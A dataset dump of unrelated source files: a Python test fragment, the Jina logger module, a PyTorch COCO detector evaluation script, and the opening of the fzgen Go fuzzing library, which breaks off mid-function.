# heh
with random_seed(0):
self.assertNotEqual(random_identifier(), random_identifier())
class UniqueTestCase(TestCase):
def test_empty(self):
self.assertEqual(list(unique([])), [])
def test_de_duplication(self):
self.assertEqual(list(unique([1, 2, 1, 5, 1])),
[1, 2, 5])
def test_preserves_order(self):
self.assertEqual(list(unique([6, 7, 2, 0, 7, 1])),
[6, 7, 2, 0, 1])
def test_mixed_types_ok(self):
self.assertEqual(list(unique(['a', None, 33, 'a'])),
['a', None, 33])
class WhichTestCase(SandboxedTestCase):
# which() is just a passthrough to shutil.which() and
# distutils.spawn.find_executable, so we're really just
# testing for consistent behavior across versions
def setUp(self):
super(WhichTestCase, self).setUp()
self.shekondar_path = self.makefile('shekondar', executable=True)
def test_explicit_path(self):
self.assertEqual(which('shekondar', path=self.tmp_dir),
self.shekondar_path)
def test_path_from_environment(self):
with patch.dict(os.environ, PATH=self.tmp_dir):
self.assertEqual(which('shekondar'), self.shekondar_path)
def test_not_found(self):
self.assertEqual(which('shekondar-the-fearsome', self.tmp_dir), None)
def test_no_path(self):
with patch.dict(os.environ, clear=True):
# make sure we protect find_executable() from missing $PATH
# on Python 2.
self.assertEqual(which('shekondar'), None)
|
[] |
[] |
[] |
[]
|
[]
|
python
| 0 | 0 | |
jina/logging/logger.py
|
__copyright__ = "Copyright (c) 2020 Jina AI Limited. All rights reserved."
__license__ = "Apache-2.0"
import logging
import logging.handlers
import os
import platform
import re
import sys
from typing import Optional
from pkg_resources import resource_filename
from . import formatter
from ..enums import LogVerbosity
from ..jaml import JAML
class NTLogger:
"""A compatible logger for Windows system, colors are all removed to keep compatible."""
def __init__(self, context: str, log_level: 'LogVerbosity' = LogVerbosity.INFO):
"""
Create a compatibility logger for Windows systems; all colors are removed to keep the output compatible.
:param context: The name prefix of each log.
:param log_level: Level of log.
"""
self.context = self._planify(context)
self.log_level = log_level
@staticmethod
def _planify(msg):
return re.sub(r'\u001b\[.*?[@-~]', '', msg)
def info(self, msg: str, **kwargs):
"""
Log info-level message.
:param msg: Content of log.
"""
if self.log_level <= LogVerbosity.INFO:
sys.stdout.write(f'{self.context}[I]:{self._planify(msg)}')
def critical(self, msg: str, **kwargs):
"""
Log critical-level message.
:param msg: Content of log.
"""
if self.log_level <= LogVerbosity.CRITICAL:
sys.stdout.write(f'{self.context}[C]:{self._planify(msg)}')
def debug(self, msg: str, **kwargs):
"""
Log debug-level message.
:param msg: Content of log.
"""
if self.log_level <= LogVerbosity.DEBUG:
sys.stdout.write(f'{self.context}[D]:{self._planify(msg)}')
def error(self, msg: str, **kwargs):
"""
Log error-level message.
:param msg: Content of log.
"""
if self.log_level <= LogVerbosity.ERROR:
sys.stdout.write(f'{self.context}[E]:{self._planify(msg)}')
def warning(self, msg: str, **kwargs):
"""
Log warning-level message.
:param msg: Content of log.
"""
if self.log_level <= LogVerbosity.WARNING:
sys.stdout.write(f'{self.context}[W]:{self._planify(msg)}')
def success(self, msg: str, **kwargs):
"""
Log success-level message.
:param msg: Content of log.
"""
if self.log_level <= LogVerbosity.SUCCESS:
sys.stdout.write(f'{self.context}[S]:{self._planify(msg)}')
class PrintLogger(NTLogger):
@staticmethod
def _planify(msg):
return msg
class SysLogHandlerWrapper(logging.handlers.SysLogHandler):
"""
Override the priority_map of :class:`SysLogHandler`.
.. warning::
On macOS, messages at DEBUG and INFO level are not stored by ASL (the Apple System Log),
which in turn means they can't be printed by syslog after the fact. You can confirm this via :command:`syslog` or
:command:`tail -f /var/log/system.log`.
"""
priority_map = {
'DEBUG': 'debug',
'INFO': 'info',
'WARNING': 'warning',
'ERROR': 'error',
'CRITICAL': 'critical',
'SUCCESS': 'notice'
}
class JinaLogger:
supported = {'FileHandler', 'StreamHandler', 'SysLogHandler', 'FluentHandler'}
def __init__(self,
context: str,
name: Optional[str] = None,
log_config: Optional[str] = None,
identity: Optional[str] = None,
workspace_path: Optional[str] = None,
**kwargs):
"""
Build a logger for a context.
:param context: The context identifier of the class, module or method.
:param log_config: The configuration file for the logger.
:param identity: The id of the group the messages from this logger will belong to, used by the default
fluentd configuration to group logs by pod.
:param workspace_path: The workspace path where the log will be stored (only applies to fluentd).
:param name: The name of the logger (defaults to the JINA_POD_NAME environment variable, or the context).
"""
from .. import __uptime__
if not log_config:
log_config = os.getenv('JINA_LOG_CONFIG',
resource_filename('jina', '/'.join(
('resources', 'logging.default.yml'))))
if not identity:
identity = os.getenv('JINA_LOG_ID', None)
if not name:
name = os.getenv('JINA_POD_NAME', context)
# Remove all handlers associated with the root logger object.
for handler in logging.root.handlers[:]:
logging.root.removeHandler(handler)
self.logger = logging.getLogger(context)
self.logger.propagate = False
if workspace_path is None:
workspace_path = os.getenv('JINA_LOG_WORKSPACE', '/tmp/jina/')
context_vars = {'name': name,
'uptime': __uptime__,
'context': context,
'workspace_path': workspace_path}
if identity:
context_vars['log_id'] = identity
self.add_handlers(log_config, **context_vars)
# note: logger.success isn't a standard logging level, so register it here
success_level = LogVerbosity.SUCCESS.value # between WARNING and INFO
logging.addLevelName(success_level, 'SUCCESS')
setattr(self.logger, 'success', lambda message: self.logger.log(success_level, message))
self.info = self.logger.info
self.critical = self.logger.critical
self.debug = self.logger.debug
self.error = self.logger.error
self.warning = self.logger.warning
self.success = self.logger.success
@property
def handlers(self):
"""
Get the handlers of the logger.
:returns: Handlers of logger.
"""
return self.logger.handlers
def __enter__(self):
return self
def __exit__(self, exc_type, exc_val, exc_tb):
self.close()
def close(self):
"""
Close all the handlers.
:returns: None
"""
for handler in self.logger.handlers:
handler.close()
def add_handlers(self, config_path: str = None, **kwargs):
"""
Add handlers from config file.
:param config_path: Path of config file.
:param kwargs: Extra parameters.
:returns: None
"""
self.logger.handlers = []
with open(config_path) as fp:
config = JAML.load(fp)
for h in config['handlers']:
cfg = config['configs'].get(h, None)
if h not in self.supported or not cfg:
raise ValueError(f'cannot find configs for {h}, maybe it is not supported')
fmt = getattr(formatter, cfg.get('formatter', 'PlainFormatter'))
handler = None
if h == 'StreamHandler':
handler = logging.StreamHandler(sys.stdout)
handler.setFormatter(fmt(cfg['format'].format_map(kwargs)))
elif h == 'SysLogHandler':
if cfg['host'] and cfg['port']:
handler = SysLogHandlerWrapper(address=(cfg['host'], cfg['port']))
else:
# a UNIX socket is used
if platform.system() == 'Darwin':
handler = SysLogHandlerWrapper(address='/var/run/syslog')
else:
handler = SysLogHandlerWrapper(address='/dev/log')
if handler:
handler.ident = cfg.get('ident', '')
handler.setFormatter(fmt(cfg['format'].format_map(kwargs)))
try:
handler._connect_unixsocket(handler.address)
except OSError:
handler = None
elif h == 'FileHandler':
handler = logging.FileHandler(cfg['output'].format_map(kwargs), delay=True)
handler.setFormatter(fmt(cfg['format'].format_map(kwargs)))
elif h == 'FluentHandler':
from ..importer import ImportExtensions
with ImportExtensions(required=False, verbose=False):
from fluent import asynchandler as fluentasynchandler
from fluent.handler import FluentRecordFormatter
handler = fluentasynchandler.FluentHandler(cfg['tag'],
host=cfg['host'],
port=cfg['port'], queue_circular=True)
cfg['format'].update(kwargs)
fmt = FluentRecordFormatter(cfg['format'])
handler.setFormatter(fmt)
if handler:
self.logger.addHandler(handler)
verbose_level = LogVerbosity.from_string(config['level'])
if 'JINA_LOG_LEVEL' in os.environ:
verbose_level = LogVerbosity.from_string(os.environ['JINA_LOG_LEVEL'])
self.logger.setLevel(verbose_level.value)
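# A minimal usage sketch (assuming the bundled default logging config is available):
#
#     from jina.logging.logger import JinaLogger
#
#     with JinaLogger('my-context') as logger:
#         logger.info('hello')
#         logger.success('done')
#
# The context manager form ensures all handlers are closed on exit.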
|
[] |
[] |
[
"JINA_LOG_LEVEL",
"JINA_LOG_WORKSPACE",
"JINA_LOG_ID",
"JINA_POD_NAME",
"JINA_LOG_CONFIG"
] |
[]
|
["JINA_LOG_LEVEL", "JINA_LOG_WORKSPACE", "JINA_LOG_ID", "JINA_POD_NAME", "JINA_LOG_CONFIG"]
|
python
| 5 | 0 | |
public/test_scripts/test_on_coco.py
|
import time
import random
import argparse
import json
import os
import sys
import warnings
BASE_DIR = os.path.dirname(
os.path.dirname(os.path.dirname(os.path.abspath(__file__))))
sys.path.append(BASE_DIR)
warnings.filterwarnings('ignore')
from tqdm import tqdm
from thop import profile
from thop import clever_format
import torch
import torch.nn as nn
import torch.backends.cudnn as cudnn
import torchvision.transforms as transforms
from torch.utils.data import DataLoader
from public.path import COCO2017_path
from public.detection.dataset.cocodataset import Collater
from public.detection.models.retinanet import RetinaNet
from public.detection.models.fcos import FCOS
from public.detection.models.centernet import CenterNet
from public.detection.models.yolov3 import YOLOV3
from public.detection.models.decode import RetinaDecoder, FCOSDecoder, CenterNetDecoder, YOLOV3Decoder
from public.detection.dataset.cocodataset import CocoDetection, Normalize, Resize
from pycocotools.cocoeval import COCOeval
def _retinanet(arch, use_pretrained_model, pretrained_model_path, num_classes):
model = RetinaNet(arch, num_classes=num_classes)
if use_pretrained_model:
pretrained_models = torch.load(pretrained_model_path,
map_location=torch.device('cpu'))
# only load state_dict()
model.load_state_dict(pretrained_models, strict=False)
return model
def _fcos(arch, use_pretrained_model, pretrained_model_path, num_classes):
model = FCOS(arch, num_classes=num_classes)
if use_pretrained_model:
pretrained_models = torch.load(pretrained_model_path,
map_location=torch.device('cpu'))
# only load state_dict()
model.load_state_dict(pretrained_models, strict=False)
return model
def _centernet(arch, use_pretrained_model, pretrained_model_path, num_classes):
model = CenterNet(arch, num_classes=num_classes)
if use_pretrained_model:
pretrained_models = torch.load(pretrained_model_path,
map_location=torch.device('cpu'))
# only load state_dict()
model.load_state_dict(pretrained_models, strict=False)
return model
def _yolov3(arch, use_pretrained_model, pretrained_model_path, num_classes):
model = YOLOV3(arch, num_classes=num_classes)
if use_pretrained_model:
pretrained_models = torch.load(pretrained_model_path,
map_location=torch.device('cpu'))
# only load state_dict()
model.load_state_dict(pretrained_models, strict=False)
return model
def validate(val_dataset, model, decoder, args):
if args.use_gpu:
model = model.module
# switch to evaluate mode
model.eval()
with torch.no_grad():
all_eval_result = evaluate_coco(val_dataset, model, decoder, args)
return all_eval_result
def evaluate_coco(val_dataset, model, decoder, args):
results, image_ids = [], []
indexes = []
for index in range(len(val_dataset)):
indexes.append(index)
eval_collater = Collater()
val_loader = DataLoader(val_dataset,
batch_size=args.batch_size,
shuffle=False,
num_workers=args.num_workers,
collate_fn=eval_collater.next)
start_time = time.time()
for i, data in tqdm(enumerate(val_loader)):
images, scales = torch.tensor(data['img']), torch.tensor(data['scale'])
per_batch_indexes = indexes[i * args.batch_size:(i + 1) *
args.batch_size]
if args.use_gpu:
images = images.cuda().float()
else:
images = images.float()
if args.detector == "retinanet":
cls_heads, reg_heads, batch_anchors = model(images)
scores, classes, boxes = decoder(cls_heads, reg_heads,
batch_anchors)
elif args.detector == "fcos":
cls_heads, reg_heads, center_heads, batch_positions = model(images)
scores, classes, boxes = decoder(cls_heads, reg_heads,
center_heads, batch_positions)
elif args.detector == "centernet":
heatmap_output, offset_output, wh_output = model(images)
scores, classes, boxes = decoder(heatmap_output, offset_output,
wh_output)
elif args.detector == "yolov3":
obj_heads, reg_heads, cls_heads, batch_anchors = model(images)
scores, classes, boxes = decoder(obj_heads, reg_heads, cls_heads,
batch_anchors)
scores, classes, boxes = scores.cpu(), classes.cpu(), boxes.cpu()
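# predictions were made on resized images, so divide the boxes by the
# per-image scale factors to map them back to original image coordinates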
scales = scales.unsqueeze(-1).unsqueeze(-1)
boxes /= scales
for per_image_scores, per_image_classes, per_image_boxes, index in zip(
scores, classes, boxes, per_batch_indexes):
# for coco_eval,we need [x_min,y_min,w,h] format pred boxes
per_image_boxes[:, 2:] -= per_image_boxes[:, :2]
for object_score, object_class, object_box in zip(
per_image_scores, per_image_classes, per_image_boxes):
object_score = float(object_score)
object_class = int(object_class)
object_box = object_box.tolist()
if object_class == -1:
break
image_result = {
'image_id':
val_dataset.image_ids[index],
'category_id':
val_dataset.find_category_id_from_coco_label(object_class),
'score':
object_score,
'bbox':
object_box,
}
results.append(image_result)
image_ids.append(val_dataset.image_ids[index])
print('{}/{}'.format(index, len(val_dataset)), end='\r')
testing_time = (time.time() - start_time)
per_image_testing_time = testing_time / len(val_dataset)
print(f"per_image_testing_time:{per_image_testing_time:.3f}")
if not len(results):
print(f"No target detected in test set images")
return
json.dump(results,
open('{}_bbox_results.json'.format(val_dataset.set_name), 'w'),
indent=4)
# load results in COCO evaluation tool
coco_true = val_dataset.coco
coco_pred = coco_true.loadRes('{}_bbox_results.json'.format(
val_dataset.set_name))
coco_eval = COCOeval(coco_true, coco_pred, 'bbox')
coco_eval.params.imgIds = image_ids
coco_eval.evaluate()
coco_eval.accumulate()
coco_eval.summarize()
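# coco_eval.stats is a 12-element array: AP at IoU=0.50:0.95/0.50/0.75,
# AP for small/medium/large objects, then AR at maxDets=1/10/100 and
# AR for small/medium/large objects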
all_eval_result = coco_eval.stats
return all_eval_result
def test_model(args):
print(args)
if args.use_gpu:
# use one graphics card (GPU 0) to test
os.environ["CUDA_VISIBLE_DEVICES"] = "0"
if not torch.cuda.is_available():
raise Exception("need gpu to test network!")
torch.cuda.empty_cache()
if args.seed is not None:
random.seed(args.seed)
if args.use_gpu:
torch.cuda.manual_seed_all(args.seed)
cudnn.deterministic = True
if args.use_gpu:
cudnn.benchmark = True
cudnn.enabled = True
coco_val_dataset = CocoDetection(
image_root_dir=os.path.join(COCO2017_path, 'images/val2017'),
annotation_root_dir=os.path.join(COCO2017_path, 'annotations'),
set="val2017",
transform=transforms.Compose([
Normalize(),
Resize(resize=args.input_image_size),
]))
if args.detector == "retinanet":
model = _retinanet(args.backbone, args.use_pretrained_model,
args.pretrained_model_path, args.num_classes)
decoder = RetinaDecoder(image_w=args.input_image_size,
image_h=args.input_image_size,
min_score_threshold=args.min_score_threshold)
elif args.detector == "fcos":
model = _fcos(args.backbone, args.use_pretrained_model,
args.pretrained_model_path, args.num_classes)
decoder = FCOSDecoder(image_w=args.input_image_size,
image_h=args.input_image_size,
min_score_threshold=args.min_score_threshold)
elif args.detector == "centernet":
model = _centernet(args.backbone, args.use_pretrained_model,
args.pretrained_model_path, args.num_classes)
decoder = CenterNetDecoder(
image_w=args.input_image_size,
image_h=args.input_image_size,
min_score_threshold=args.min_score_threshold)
elif args.detector == "yolov3":
model = _yolov3(args.backbone, args.use_pretrained_model,
args.pretrained_model_path, args.num_classes)
decoder = YOLOV3Decoder(image_w=args.input_image_size,
image_h=args.input_image_size,
min_score_threshold=args.min_score_threshold)
else:
print("unsupport detection model!")
return
flops_input = torch.randn(1, 3, args.input_image_size,
args.input_image_size)
flops, params = profile(model, inputs=(flops_input, ))
flops, params = clever_format([flops, params], "%.3f")
print(
f"backbone:{args.backbone},detector: '{args.detector}', flops: {flops}, params: {params}"
)
if args.use_gpu:
model = model.cuda()
decoder = decoder.cuda()
model = nn.DataParallel(model)
print(f"start eval.")
all_eval_result = validate(coco_val_dataset, model, decoder, args)
print(f"eval done.")
if all_eval_result is not None:
print(
f"val: backbone: {args.backbone}, detector: {args.detector}, IoU=0.5:0.95,area=all,maxDets=100,mAP:{all_eval_result[0]:.3f}, IoU=0.5,area=all,maxDets=100,mAP:{all_eval_result[1]:.3f}, IoU=0.75,area=all,maxDets=100,mAP:{all_eval_result[2]:.3f}, IoU=0.5:0.95,area=small,maxDets=100,mAP:{all_eval_result[3]:.3f}, IoU=0.5:0.95,area=medium,maxDets=100,mAP:{all_eval_result[4]:.3f}, IoU=0.5:0.95,area=large,maxDets=100,mAP:{all_eval_result[5]:.3f}, IoU=0.5:0.95,area=all,maxDets=1,mAR:{all_eval_result[6]:.3f}, IoU=0.5:0.95,area=all,maxDets=10,mAR:{all_eval_result[7]:.3f}, IoU=0.5:0.95,area=all,maxDets=100,mAR:{all_eval_result[8]:.3f}, IoU=0.5:0.95,area=small,maxDets=100,mAR:{all_eval_result[9]:.3f}, IoU=0.5:0.95,area=medium,maxDets=100,mAR:{all_eval_result[10]:.3f}, IoU=0.5:0.95,area=large,maxDets=100,mAR:{all_eval_result[11]:.3f}"
)
return
if __name__ == "__main__":
parser = argparse.ArgumentParser(
description='PyTorch COCO Detection Testing')
parser.add_argument('--backbone', type=str, help='name of backbone')
parser.add_argument('--detector', type=str, help='name of detector')
parser.add_argument('--batch_size',
type=int,
default=1,
help='inference batch size')
parser.add_argument('--num_workers',
type=int,
default=1,
help='num workers')
parser.add_argument('--num_classes',
type=int,
default=80,
help='model class num')
parser.add_argument('--min_score_threshold',
type=float,
default=0.05,
help='min score threshold')
parser.add_argument("--use_pretrained_model",
action="store_true",
help="use pretrained model or not")
parser.add_argument('--pretrained_model_path',
type=str,
help='pretrained model path')
parser.add_argument("--use_gpu",
action="store_true",
help="use gpu to test or not")
parser.add_argument('--seed', type=int, default=0, help='seed')
parser.add_argument('--input_image_size',
type=int,
default=667,
help='input image size')
args = parser.parse_args()
test_model(args)
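# example invocation (paths and values below are illustrative, not defaults):
# python test_on_coco.py --backbone resnet50 --detector retinanet \
#     --use_pretrained_model --pretrained_model_path ./retinanet_resnet50.pth \
#     --input_image_size 667 --use_gpu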
|
[] |
[] |
[
"CUDA_VISIBLE_DEVICES"
] |
[]
|
["CUDA_VISIBLE_DEVICES"]
|
python
| 1 | 0 | |
fuzzer/fuzzer.go
|
// Package fuzzer supports fuzzing rich signatures via the Fill method, as well as
// the ability to automatically chain Steps together under
// the control of the fuzzer using the Chain method.
//
// Package fuzzer can be used completely independently from the fzgen command
// by manually constructing fuzzing functions, or the fzgen command can
// be used to automatically create wrappers that use package fuzzer.
//
// See the project README for additional information:
// https://github.com/thepudds/fzgen
package fuzzer
import (
"bytes"
"fmt"
"os"
"reflect"
"runtime"
"strconv"
"strings"
"sync"
"github.com/sanity-io/litter"
"github.com/thepudds/fzgen/fuzzer/internal/plan"
"github.com/thepudds/fzgen/fuzzer/internal/randparam"
)
// SupportedInterfaces enumerates interfaces that can be filled by Fill(&obj).
var SupportedInterfaces = randparam.SupportedInterfaces
// Step describes an operation to step the system forward.
// Func can take any number of arguments and return any number of values.
// The Name string conventionally should be an acceptable func identifier.
// See Chain for more details on usage.
type Step struct {
Name string
Func interface{}
}
// Fuzzer is a utility object that can fill in many types
// such as io.Reader, structs, maps, and so on, as well as supports chaining over a set of
// functions in sequence, including connecting output to inputs
// and re-using inputs (e.g., to help exercise APIs like a Store followed
// by a Load).
// Conventionally called 'fz'.
type Fuzzer struct {
data []byte
randparamFuzzer *randparam.Fuzzer
execState *execState
chainOpts chainOpts
}
type FuzzerOpt func(*Fuzzer) error
// NewFuzzer returns a Fuzzer, which relies on the input data []byte
// to control its subsequent operations.
// NewFuzzer accepts options for future use, though none are currently defined.
func NewFuzzer(data []byte, options ...FuzzerOpt) (fz *Fuzzer) {
fill := randparam.NewFuzzer(data)
state := &execState{
reusableInputs: make(map[reflect.Type][]*reflect.Value),
outputSlots: make(map[reflect.Type][]*outputSlot),
// TODO: not needed?
// reusableOutputs: make(map[reflect.Type][]reflect.Value),
}
return &Fuzzer{
data: data,
randparamFuzzer: fill,
execState: state,
}
}
// Fill fills in most simple types, maps, slices, arrays, and recursively fills any public members of x.
// It supports about 20 or so common interfaces, such as io.Reader, io.Writer, or io.ReadWriter.
// See SupportedInterfaces for current list of supported interfaces.
// Callers pass in a pointer to the object to fill, such as:
// var i int
// Fill(&i)
// var r io.Reader
// Fill(&r)
// var s1, s2 string
// Fill(&s1, &s2)
// Fill ignores channels, func pointers, complex64, complex128, and uintptr.
// For number, string, and []byte types, it tries to populate the obj value with literals found in the initial input []byte.
//
// In order to maximize deterministic behavior, help guide the fuzzing engine, and allow for generation of reproducers,
// Fill must not be called from within the Steps used with Chain. If you need additional values within a Step, add
// them as parameters to the Step, and Chain will fill those parameters.
func (fz *Fuzzer) Fill(x ...interface{}) {
// TODO: probably panic if called from within Chain.
for _, arg := range x {
before := fz.randparamFuzzer.Remaining()
fz.randparamFuzzer.Fill(arg)
if debugPrintPlan {
fmt.Printf("fzgen: filled object of type \"%T\" using %d bytes. %d bytes remaining.\n",
arg, before-fz.randparamFuzzer.Remaining(), fz.randparamFuzzer.Remaining())
}
}
}
type execState struct {
// reusableInputs is a map from type to list of all new args of that type from all steps,
// ordered by the sequence of calls defined in the Plan and the order within the args of a
// given Call from the plan.
// Each entry in the map is a slice of the filled-in reflect.Values for that reflect.Type
// for each argument in the plan that is defined to be a new value (and not a reused input or output).
// For example, if the plan is effectively:
// call1(a, b string)
// call2(c int, d string)
// then the map entry for key of reflect.Type string would be {a, b, d} as long as a, b, and d are defined
// by the plan to be new values. On the other hand, if the plan defines d to reuse a's input value,
// then the map entry for key of reflect.Type string would be {a, b}, without d.
reusableInputs map[reflect.Type][]*reflect.Value
// outputSlots is map from type to return value slots, covering the complete set of return types in all calls in the plan,
// and ordered by the sequence of calls defined in the Plan and the order of the return values of a
// given Call from the plan.
// It is used as an intermediate step prior to actually invoking any calls
// to determine which if any return values should be saved when it is time to invoke a specific call.
// TODO: we probably could collapse outputSlots and reusableOutputs.
outputSlots map[reflect.Type][]*outputSlot
// reusableOutputs is a map from type to a list of all return values that will be used as later inputs.
// It is similar in spirit to reusableInputs, but whereas reusableInputs contains all new input values,
// reusableOutputs only contains returns values that are planned to be reused by a subsequent call.
// For example, if the plan is effectively:
// call1() int
// call2(a int)
// and the plan defines that call2 will attempt to reuse an int return value as its input arg,
// then the map entry for key of reflect.Type int would effectively be {{call1RetVal0}},
// where call2 will use the zeroth return value from call1 as the input to call2.
// After we invoke call1, we fill in the reflect.Value in the right slot of the slice.
// When we later invoke call2, we read that value.
// Note that we set up the slice (with invalid reflect.Values) before any concurrent goroutines run,
// and then take care to read the reflect.Value (e.g., to invoke call2) only after it has been
// filled in (e.g., after the invocation of call1).
// TODO: not needed?
// reusableOutputs map[reflect.Type][]reflect.Value
}
// execCall represents a function call we intend to make, based on which
// fuzzer.Step func was selected in our Plan.
type execCall struct {
planCall plan.Call // raw plan.Call filled in by fz.Fill
name string
index int // zero-based index of this call. currently only used for emitting variable name for repro.
fv reflect.Value // func we will call.
args []argument // arguments for this call, some of which might initially be placeholder invalid reflect.Value.
outputSlots []*outputSlot // pointers to the output slots for this call's return values.
}
type argument struct {
useReturnVal bool // indicates if this argument will come from another call's return value.
typ reflect.Type // type of input argument.
val *reflect.Value // argument value to use.
slot *outputSlot // slot of the return value.
}
type outputSlot struct {
// Indicates if this return value will be used by a subsequent call. If false,
// we don't store the value after the corresponding call completes.
needed bool
// Type of return value.
typ reflect.Type
// Return value to use. Initially set to invalid reflect.Value{}, which is filled
// in after the corresponding call completes.
val reflect.Value
// Channel to broadcast via close(ch) that the return value val is ready to be read.
ch chan struct{}
// zero-indexed call that the return value will come from.
returnValCall int
// zero-indexed arg from that call that the return value will come from.
returnValArg int
}
type ChainOpt func(*Fuzzer) error
type chainOpts struct {
parallel bool
}
// ChainParallel indicates the Fuzzer is allowed to run the
// defined set of Steps in parallel. The Fuzzer can choose to run
// all selected Steps in parallel, though most often prefers
// to run only a portion of Steps in parallel in a single
// Chain execution in order to increase deterministic behavior
// and help the underlying fuzzing engine evolve interesting inputs.
// Care is taken so that a given corpus will result in the same
// Steps executing with the same arguments regardless of
// whether or not ChainParallel is set.
//
// ChainParallel is most often useful with the race detector, such as
// 'go test -fuzz=. -race', though because the race detector
// can have 10x-20x performance impact, one approach is to
// run for a period of time with ChainParallel set but
// without the race detector to build up a larger corpus faster,
// and then later run with the race detector enabled.
func ChainParallel(fz *Fuzzer) error {
fz.chainOpts.parallel = true
return nil
}
// Chain invokes a set of Steps, looking for problematic sequences and input arguments.
// The Fuzzer chooses which Steps to call and how often to call them,
// then creates any needed arguments, and calls the Steps in a sequence selected by the fuzzer.
// The only current option is ChainParallel.
// If the last return value of a Step is of type error and a non-nil value is returned,
// this indicates the sequence of Steps should stop execution.
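// A minimal usage sketch inside a fuzz target (the target and Step funcs are illustrative):
//
//	fz := fuzzer.NewFuzzer(data)
//	fz.Chain([]fuzzer.Step{
//		{Name: "Fuzz_MySafeMap_Store", Func: target.Store},
//		{Name: "Fuzz_MySafeMap_Load", Func: target.Load},
//	}, fuzzer.ChainParallel)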
func (fz *Fuzzer) Chain(steps []Step, options ...ChainOpt) {
// Start by filling in our plan, which will let us know the sequence of steps along
// with sources for input args (which might be re-using input args,
// or using return values, or new values from fz.Fill).
pl := plan.Plan{}
before := fz.randparamFuzzer.Remaining()
switch debugPlanVersion {
case 2:
// Current approach.
// Get any remaining bytes from randparamFuzzer.
data := fz.randparamFuzzer.Data()
buf := bytes.NewReader(data)
// Convert those bytes into a Plan.
pl = unmarshalPlan(buf, steps)
// Drain from randparamFuzzer any bytes we used building the Plan.
used := len(data) - buf.Len()
fz.randparamFuzzer.Drain(used)
default:
panic("unexpected debugPlanVersion")
}
if debugPrintPlan {
emitPlan(pl)
fmt.Printf("fzgen: filled Plan using %d bytes. %d bytes remaining.\n",
before-fz.randparamFuzzer.Remaining(), fz.randparamFuzzer.Remaining())
}
// Using functional options.
// (Side note: Rob Pike's blog introducing functional options is a great read:
// https://commandcenter.blogspot.com/2014/01/self-referential-functions-and-design.html)
for _, opt := range options {
// For a minor bit of backwards compatibility, skip any nil opts in case older generated code
// passes nil as the second argument.
if opt == nil {
continue
}
err := opt(fz)
if err != nil {
// TODO: currently we have no errors. panic is probably the right way to communicate from inside a fuzz func.
panic(err)
}
}
fz.chain(steps, pl)
}
func (fz *Fuzzer) chain(steps []Step, pl plan.Plan) {
parallelAllowed := fz.chainOpts.parallel
// First, determine if we will spin and loop for any parallel calls.
allowSpin, loopCount := fz.calcParallelControl()
// Second, create our list of execCalls based on the list of plan.Calls.
// We do not yet fully populate the arguments for an execCall,
// which we will do on a subsequent pass.
execCalls := make([]execCall, len(pl.Calls))
for i := range pl.Calls {
// Based on the plan, compute index into the user's Step list.
s := int(pl.Calls[i].StepIndex) % len(steps)
ec := execCall{
planCall: pl.Calls[i],
name: steps[s].Name,
index: i,
fv: mustFunc(steps[s].Func),
args: []argument{}, // empty to start, we will fill in below.
}
execCalls[i] = ec
}
// Third, create arguments as needed for each execCall,
// or record that we will obtain an argument from the
// return value of an earlier execCall.
for i := range execCalls {
allowReturnValReuse := loopCount == 1
// Build arguments for this call, and also get its reflect.Value function.
// This can update the execCall to track outputSlots.
args := fz.prepareStep(&execCalls[i], allowReturnValReuse, fz.Fill)
// Track what we need to execute this call later.
execCalls[i].args = args
}
// TODO: consider reintroducing shuffle of plan or execCalls, though might have less benefit after interweaving filling args
// with filling the plan, which then gives the fuzzing engine a better chance of reordering.
// (We've tried a few different variations of rand-based shuffling of plan or execCalls, and it's not clear how helpful they are.
// If we shuffle, care must be taken around re-using input args (for example, could shuffle after that),
// as well as around re-using return values (for example, could shuffle before that is set up to avoid shuffling
// our way into a deadlock on the arg ready channel).
sequential := true
var startParallelIndex, stopParallelIndex int // inclusive range
var parallelPlan byte
// This is purposefully the last byte drawn (after the Plan and after our args have all been filled),
// including so that tail-trim minimization will eliminate this from our input data []byte.
// If the byte was uniformly random:
// 1/8 of time - serial
// 3/4 of time - parallel pair
// 1/8 of time - parallel for up to N from end
// However, if the byte is missing (e.g., tail trim minimization) it will be drawn
// as the zero value, which purposefully means serial here,
// and which means serial will be favored if the observed coverage or crash still happens serially.
// Also, we try to take advantage of ASCII '0' minimization behavior of cmd/go
// to mean serial, and then as cmd/go minimization steps to ASCII '1', '2', '3', ...,
// we interpret those to mean pair parallel, stepping from the end.
fz.Fill(¶llelPlan)
if parallelAllowed && len(execCalls) > 1 {
switch {
case parallelPlan == '0' || parallelPlan < 32:
sequential = true
case parallelPlan < 224:
startParallelIndex, stopParallelIndex = calcParallelPair(parallelPlan, len(execCalls))
sequential = false
default:
startParallelIndex, stopParallelIndex = calcParallelN(parallelPlan, len(execCalls))
sequential = false
}
}
if sequential {
// This only matters for debug output, but might as well make it clear.
allowSpin, loopCount = false, 1
}
if debugPrintPlan {
fmt.Printf("fzgen: parallelPlan byte: %v startParallelIndex: %d stopParallelIndex: %d sequential: %v\n",
parallelPlan, startParallelIndex, stopParallelIndex, sequential)
}
if debugPrintRepro {
if sequential {
fmt.Printf("PLANNED STEPS: (sequential: %v)\n\n", sequential)
} else {
fmt.Printf("PLANNED STEPS: (sequential: %v, loop count: %d, spin: %v)\n\n", sequential, loopCount, allowSpin)
}
emitBasicRepro(execCalls, sequential, startParallelIndex, stopParallelIndex)
}
// Invoke our chained calls!
if sequential {
for _, ec := range execCalls {
fz.callStep(ec)
}
} else {
var wg sync.WaitGroup
for i := range execCalls {
// Spin between parallel calls.
if allowSpin && i > startParallelIndex && i <= stopParallelIndex {
runtime.Gosched()
spin()
}
if i >= startParallelIndex && i <= stopParallelIndex {
// This is a call we will run in parallel.
wg.Add(1)
go func(i int) {
defer wg.Done()
for j := 0; j < loopCount; j++ {
fz.callStep(execCalls[i])
}
}(i)
if i == stopParallelIndex {
// Return to sequential execution, waiting on our in-flight goroutines
// we just started above.
wg.Wait()
}
} else {
// Everything outside of startParallelIndex/stopParallelIndex runs sequentially.
fz.callStep(execCalls[i])
}
}
}
}
// calcParallelControl draws and interprets bytes to control our spinning and looping.
func (fz *Fuzzer) calcParallelControl() (allowSpin bool, loopCount int) {
// TODO: probably move drawing the bytes to marshal.go.
// TODO: orderPlan is not currently implemented, but we reserve a byte.
// (Previously, we had a couple different flavors of randomized goroutine ordering
// via a seed byte, but that is disabled).
var spinPlan, loopPlan, orderPlan byte
fz.Fill(&spinPlan, &loopPlan, &orderPlan)
// We prefer to spin (mostly to aid with reproducibility), including if '0' or 0x0 appear during minimization.
// (And yes, '0' is less than 192, but being explicit here as reminder when the numbers get juggled).
allowSpin = spinPlan == '0' || spinPlan < 192
